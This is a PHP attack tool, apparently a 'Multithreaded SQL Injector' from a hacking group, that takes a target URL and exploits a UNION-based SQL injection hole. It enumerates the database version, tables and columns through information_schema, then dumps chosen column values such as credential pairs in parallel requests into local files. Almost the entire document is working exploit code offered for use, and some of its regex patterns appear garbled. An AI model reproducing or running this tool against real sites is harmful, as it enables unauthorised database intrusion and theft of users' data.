|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/ -------------------------------------------------------------------------- * Multithreaded SQL Injector * Coded by Miyachung * Miyachung@hotmail.com * Special Thanks burtay * Janissaries.Org * Youtube Channel -> http://www.youtube.com/JanissariesOrg * Usage -> https://www.youtube.com/watch?v=pytxxNnDWEU * Dump show -> https://www.youtube.com/watch?v=TvCvtgKn6Rg ***************************************************************************/ set_time_limit(0); if(!is_dir("dumps")){mkdir("dumps");} echo "[+]Enter website: "; $site = fgets(STDIN); $site = str_replace("\r\n","",$site); $site = trim($site); if(!$site) exit("\n[-]Where is the website!"); if(!preg_match('#http#',$site)) $site = "http://".$site; echo "[+]Enter column number: "; $colons = fgets(STDIN); $colons = str_replace("\r\n","",$colons); $colons = trim($colons); if(!$colons) exit("\n[-]Where is the columns!"); echo "[+]Enter effected column: "; $effected = fgets(STDIN); $effected = str_replace("\r\n","",$effected); $effected = trim($effected); if(!$effected) exit("\n[-]Where is the effected column!"); echo "[+]Advanced SQL Injecter\n"; echo "[+]Coded by Miyachung || Janissaries.Org\n"; $version_url = __make_SQL_URL($site,$colons,$effected,FALSE,TRUE,"",__hexEncode(""),__hexEncode(""),"version()"); $version_page = fetch($version_url); if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$version_page)) { exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); } elseif(preg_match("#403 Forbidden#si",$version_page)) { exit("[-]Fail -> 403 Forbidden\n"); } $version_page = __replace($version_page); if(preg_match('##si',$version_page)) { preg_match("/(.*?)<\/v3rsion>/si",$version_page,$version); echo "[+]Version -> ".strip_tags($version[1])."\n"; } else { exit("[-]Version not found\n"); } $database_url = __make_SQL_URL($site,$colons,$effected,FALSE,TRUE,"",__hexEncode(""),__hexEncode(""),"database()"); $database_page = fetch($database_url); if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$database_page)) { exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); } elseif(preg_match("#403 Forbidden#si",$database_page)) { exit("[-]Fail -> 403 Forbidden\n"); } $database_page = __replace($database_page); if(preg_match('##si',$database_page)) { preg_match("/(.*?)<\/d4tabase>/si",$database_page,$database); echo "[+]Database -> ".strip_tags($database[1])."\n"; } else { echo "[-]Database not found\n"; } if(substr($version[1],0,1) == 5) { echo "[+]Version >= 5 getting tables,using information_schema.tables\n"; }else{exit("[-]Version < 5 , sorry can't get the tables");} $table_counturl = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.tables+where+table_schema=database()",TRUE,"",__hexEncode(""),__hexEncode(""),"count(table_name)"); $table_countpage = fetch($table_counturl); $table_countpage = __replace($table_countpage); preg_match("/(.*?)<\/t4blecount>/si",$table_countpage,$table_counted); if($table_counted[1] == null) { exit("[-]Tables not found\n"); } echo "[+]Total tables -> ".$table_counted[1]."\n"; for($xz=0;$xz<$table_counted[1];$xz++) { $table_url[] = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.tables+where+table_schema=database()",TRUE,$xz,__hexEncode(""),__hexEncode(""),"table_name"); // $table_page = fetch($table_url); // if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$table_page)) // { // exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); // } // elseif(preg_match("#403 Forbidden#si",$table_page)) // { // exit("[-]Fail -> 403 Forbidden\n"); // } // $table_page = __replace($table_page); // preg_match("/(.*?)<\/t4bles>/si",$table_page,$tables); // $tbls[] = strip_tags(trim($tables[1])); } $tbls = __threading($table_url,10,"/(.*?)<\/t4bles>/si",FALSE,FALSE); table_again: echo "\n"; $tbls = array_values(array_unique(array_filter($tbls))); if(empty($tbls)) { exit("[-]Can't get tables\n"); } foreach($tbls as $tid => $tbl) { echo "[$tid]$tbl\n"; } echo "\n[+]Choose a table for get columns,just type number (exit): "; $choose = fgets(STDIN); $choose = str_replace("\r\n","",$choose); $choose = trim($choose); if($choose == "exit") { exit("\n"); } $selected = $tbls[$choose]; $column_counturl = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.columns+where+table_name=0x".__hexEncode($selected)."",TRUE,"",__hexEncode(""),__hexEncode(""),"count(column_name)"); $column_countpage = fetch($column_counturl); $column_countpage = __replace($column_countpage); preg_match("/(.*?)<\/c0lumnscount>/si",$column_countpage,$column_counted); if($column_counted[1] == null || $column_counted[1] == 0) { echo "[-]Columns not found\n"; goto table_again; } echo "[+]Total columns for $selected -> ".$column_counted[1]."\n"; for($xc=0;$xc<$column_counted[1];$xc++) { $column_url[] = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.columns+where+table_name=0x".__hexEncode($selected)."",TRUE,$xc,__hexEncode(""),__hexEncode(""),"column_name"); // $column_page = fetch($column_url); // if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$column_page)) // { // exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); // } // elseif(preg_match("#403 Forbidden#si",$column_page)) // { // exit("[-]Fail -> 403 Forbidden\n"); // } // $column_page = __replace($column_page); // preg_match("/(.*?)<\/c0lumns>/si",$column_page,$columns); // $cols[] = strip_tags(trim($columns[1])); } $cols = __threading($column_url,5,"/(.*?)<\/c0lumns>/si",FALSE,FALSE); col_showagain: echo "\n"; $cols = array_values(array_unique(array_filter($cols))); foreach($cols as $cid => $colname) { echo "[$cid]$colname\n"; } what_again: echo "\n[+]What do you wanna do (dump,back,exit): "; $whatdo = fgets(STDIN); $whatdo = str_replace("\r\n","",$whatdo); $whatdo = trim($whatdo); if($whatdo == "dump") { col_ask: echo "[+]Select dump column 1,just type number(back,exit): "; $select_col1 = fgets(STDIN); $select_col1 = str_replace("\r\n","",$select_col1); $select_col1 = trim($select_col1); if($select_col1 == "back") { goto col_showagain; } elseif($select_col1 == "exit") { exit("\n"); } echo "[+]Select dump column 2,type number(if you don't want just enter,back,exit): "; $select_col2 = fgets(STDIN); $select_col2 = str_replace("\r\n","",$select_col2); $select_col2 = trim($select_col2); if($select_col2 == "back") { goto col_ask; } elseif($select_col2 == "exit") { exit("\n"); } elseif(!empty($select_col2)) { $column2 = $cols[$select_col2]; } $column1 = $cols[$select_col1]; $count_url = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,"",__hexEncode(""),__hexEncode(""),"count($column1)"); $count_page = fetch($count_url); $count_page = __replace($count_page); preg_match("/(.*?)<\/miyacount>/si",$count_page,$datacount); if(trim($datacount[1]) == null || $datacount[1] == 0) { echo "[-]Columns empty\n"; goto col_showagain; } echo "[+]Total datas -> ".$datacount[1]."\n"; echo "[+]Using LIMIT NULL,1 for dump\n\n"; for($x=0;$x<=$datacount[1];$x++) { if($column2) { $dump_url[] = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,$x,__hexEncode(""),__hexEncode(""),"$column1,0x3a,$column2"); $filename = "dumps/".__parse($site).",$column1"."_"."$column2.txt"; } else { $dump_url[] = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,$x,__hexEncode(""),__hexEncode(""),"$column1"); $filename = "dumps/".__parse($site).",$column1.txt"; } // $dump_page = fetch($dump_url); // if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$dump_page)) // { // exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); // } // elseif(preg_match("#403 Forbidden#si",$dump_page)) // { // exit("[-]Fail -> 403 Forbidden\n"); // } // $dump_page = __replace($dump_page); // if(preg_match("/(.*?)<\/dumped>/si",$dump_page,$dumps)) // { // $dump = $dumps[1]; // echo strip_tags(trim("[$x]$dump"))."\n"; // ob_flush();flush(); // __dumpsave($filename,$dump."\r\n"); // } } if($datacount[1] >= 20) { $dumps = __threading($dump_url,10,"/(.*?)<\/dumped>/si",TRUE,TRUE,$filename); } else { $dumps = __threading($dump_url,10,"/(.*?)<\/dumped>/si",TRUE,FALSE,""); } unset($column_url); unset($dump_url); goto col_showagain; } elseif($whatdo == "back") { unset($column_url); unset($cols); goto table_again; } elseif($whatdo == "exit") { exit("\n"); } else { echo "[-]Unknown command\n"; goto what_again; } function fetch($url) { $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$url); curl_setopt($curl,CURLOPT_TIMEOUT,10); $oba = curl_exec($curl); return $oba; } function __make_SQL_URL($site,$colons,$effected,$from,$concat,$limit,$hex1,$hex2,$what) { $colon_union = range(1,$colons); if($concat) { $colon_union[$effected-1] = "concat(0x$hex1,$what,0x$hex2)"; } else { $colon_union[$effected-1] = "group_concat(0x$hex1,$what,0x$hex2)"; } $colon_union = implode(",",$colon_union); if($from) { if($limit != null) { $url = $site."+and+1=0+union+select+".$colon_union.$from."+limit+$limit,1--"; }else { $url = $site."+and+1=0+union+select+".$colon_union.$from."--"; } }else{ if($limit != null) { $url = $site."+and+1=0+union+select+".$colon_union."+limit+$limit,1--"; } $url = $site."+and+1=0+union+select+".$colon_union."--"; } return $url; } function __threading($urls,$thread,$regex,$yaz,$kaydet,$file=NULL) { $init = curl_multi_init(); $urls = array_chunk($urls,$thread); $x = 0; foreach($urls as $url) { for($i=0;$i<=count($url)-1;$i++) { $curl[$i] = curl_init(); curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1); curl_setopt($curl[$i],CURLOPT_URL,$url[$i]); curl_setopt($curl[$i],CURLOPT_TIMEOUT,10); curl_multi_add_handle($init,$curl[$i]); } do{curl_multi_exec($init,$active);usleep(11);}while($active>0); foreach($curl as $cid => $page) { $content[$cid] = curl_multi_getcontent($page); curl_multi_remove_handle($init,$page); if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$content[$cid])) { exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); } elseif(preg_match("#403 Forbidden#si",$content[$cid])) { exit("[-]Fail -> 403 Forbidden\n"); } preg_match($regex,$content[$cid],$veri); if($yaz == TRUE) { if(!empty($veri[1]) && preg_match("/[a-zA-Z0-9]:[a-zA-Z0-9]/si",$veri[1])) { $x++; echo "[$x]$veri[1]\n"; ob_flush();flush(); if($kaydet == TRUE && $file != NULL) { $fopen = fopen($file,'ab'); fwrite($fopen,trim($veri[1])."\r\n"); fclose($fopen); } } } else { $veriler[] = $veri[1]; } } } return $veriler; } function __hexEncode($string) { $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; } function __replace($text) { $text = str_replace("<","<",$text); $text = str_replace(">",">",$text); return $text; } function __dumpsave($file,$text) { $fp = fopen($file,'ab'); fwrite($fp,$text); fclose($fp); return true; } function __parse($site) { $site = explode("/",$site); $site = $site[2]; return $site; } ?>